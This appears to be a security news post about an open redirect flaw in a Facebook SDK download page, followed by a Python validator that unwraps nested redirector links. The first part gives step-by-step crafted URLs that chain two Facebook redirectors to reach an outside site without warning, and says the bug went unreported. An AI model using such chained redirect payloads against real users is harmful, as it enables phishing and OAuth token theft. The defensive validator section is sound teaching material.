Algerian security researcher "Asesino04" of The Black Devils discovered an open URL redirection vulnerability in Facebook that allowed an attacker to have a facebook.com link redirect to any website without the "Leave Facebook" notice from Facebook.
This kind of vulnerability is used to trick the victim into clicking a trusted link which is designed to lead the victim to a malicious website.
This vulnerability, especially if it is used to make a redirection on a third-party application, can also allow an attacker to steal the access token [OAuth bug], which is very critical and dangerous.
The finder of the exploit, who is also a member of the 1337DAY Team, didn't report the bug to Facebook.
The vulnerability exists on the page where anyone can download the iOS or Android SDK.
You go to:
and you copy the link of "Download SDK"
# you keep only this
https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=
# then you add to it
https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F
# so it becomes like this:
https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F
https://www.facebook.com/campaign/landing.php?url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F
:)
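The chain above works because the landing page only checks that the `url` parameter points at a facebook.com address, while the address it is given (`l.php?u=...`) is itself a redirector. A redirect validator that wants to close this class of bug has to unwrap nested redirector parameters before it decides where a link really ends up. The following Python example is added here to show that check; it is not code from the post or from Facebook. The two endpoint-to-parameter mappings are modelled on the URLs quoted above, the allowed host list is an assumption, and the sample links in the test are constructed.

```python
from urllib.parse import urlparse, parse_qs

# Hosts a redirect may land on (assumption: the site's own hosts).
ALLOWED_HOSTS = {"www.facebook.com", "facebook.com"}

# Endpoints on those hosts that are themselves parameter-driven redirectors,
# with the name of the parameter carrying the next target.  Modelled on the
# two endpoints quoted in the post; the mapping itself is an assumption.
REDIRECTOR_PARAMS = {
    "/campaign/landing.php": "url",
    "/l.php": "u",
}


def final_destination(url: str, max_hops: int = 5) -> str:
    """Statically unwrap nested redirector parameters (no network requests).

    While the current URL points at an allowed host AND at a path that is a
    known redirector, replace it with that redirector's target parameter.
    Stops at the first URL that is not a redirector, or raises if the chain
    is suspiciously deep.
    """
    for _ in range(max_hops):
        parsed = urlparse(url)
        param = REDIRECTOR_PARAMS.get(parsed.path)
        if param is None or parsed.hostname not in ALLOWED_HOSTS:
            return url
        targets = parse_qs(parsed.query).get(param)  # parse_qs percent-decodes values
        if not targets:
            return url  # redirector with an empty target stays on its own page
        url = targets[0]
    raise ValueError("redirect chain too deep")


def is_safe_redirect(url: str) -> bool:
    """Return True only if following the link can end on an allowed host."""
    # Browsers treat backslash as slash; CR/LF in a Location value enable
    # header injection.  Reject both outright rather than trying to normalise.
    if "\\" in url or any(c in url for c in "\r\n\t"):
        return False
    try:
        target = final_destination(url.strip())
    except ValueError:
        return False
    parsed = urlparse(target)
    if parsed.scheme == "" and parsed.netloc == "":
        # Plain relative path on the current origin.  A scheme-relative
        # "//host/..." would have produced a netloc, so it never reaches here.
        return target.startswith("/") and not target.startswith("//")
    if parsed.scheme not in ("http", "https"):
        return False  # javascript:, data:, and friends
    # hostname strips userinfo ("allowed.example@evil.example") and port, and lowercases.
    return parsed.hostname in ALLOWED_HOSTS


if __name__ == "__main__":
    chained = ("https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929"
               "&placement=Android_SDK&url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F")
    print(final_destination(chained))   # the external site hidden two hops down
    print(is_safe_redirect(chained))    # False
```

The key design choice is that `final_destination` resolves the chain statically from the query string instead of following HTTP redirects, so the check runs at link-emission time with no network access and cannot be fooled by a redirector that only misbehaves for real browsers. Anything that still has an unknown scheme, a foreign host, or an over-long chain after unwrapping is refused.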
The bug has full disclosure:
http://packetstormsecurity.com/files/124059/Facebook-Open-Redirection.html
http://exploitsdownload.com/exploit/na/facebook-open-redirection
A proof of concept: